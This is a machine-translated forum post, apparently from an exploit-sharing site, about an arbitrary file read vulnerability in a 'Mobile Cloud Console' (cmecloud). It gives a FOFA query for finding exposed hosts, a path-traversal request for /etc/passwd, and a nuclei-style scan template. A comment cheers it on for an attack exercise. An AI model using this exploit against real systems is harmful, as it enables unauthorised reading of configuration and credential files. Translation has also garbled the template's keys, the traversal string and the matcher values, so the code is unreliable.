Sicherheitslücke beim Lesen beliebiger Dateien in der Mobile Cloud-Konsole
Anwendungssicherheit 3264
Mobile Cloud Console ist ein System, mit dem mobile Cloud-Produkte und -Dienste auf einheitliche Weise angezeigt und verwaltet werden können. In der Mobile Cloud Console gibt es eine Sicherheitslücke beim Lesen beliebiger Dateien, die von unbefugten Angreifern ausgenutzt werden kann, um sensible Informationen wie Website-Konfigurationsdateien zu lesen.
fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
poc
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Rechner: ip
Yaml
id: cmecloud-Konsole-Lesedatei
Info: Name: cmecloud-Konsole-Lesedatei
Name: cmecloud-Konsole-Lesedatei
Autor: onewin
Schweregrad: hoch
description: Mobile Cloud Console existiert zum Lesen beliebiger Dateien
http.
- raw.
- |+
@Zeitüberschreitung: 30s
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Host: {{Hostname}}
Matcher-Bedingung: und
Übereinstimmungen: {{Hostname}}
- Typ: Status
status: {{Hostname}} matchers-Bedingung: und matchers: Typ: status
- 200
- Typ: Wort
Wörter.
- "Wurzel"
Teil: Körper
-
Die aktuelle Antwort wird als die beste angenommen
HVV Gleich geht's los, und hier kommt das Schlupfloch. :)
6 vor Monaten
Bitte Anmeldung oder registrieren, um einen Kommentar hinzuzufügen.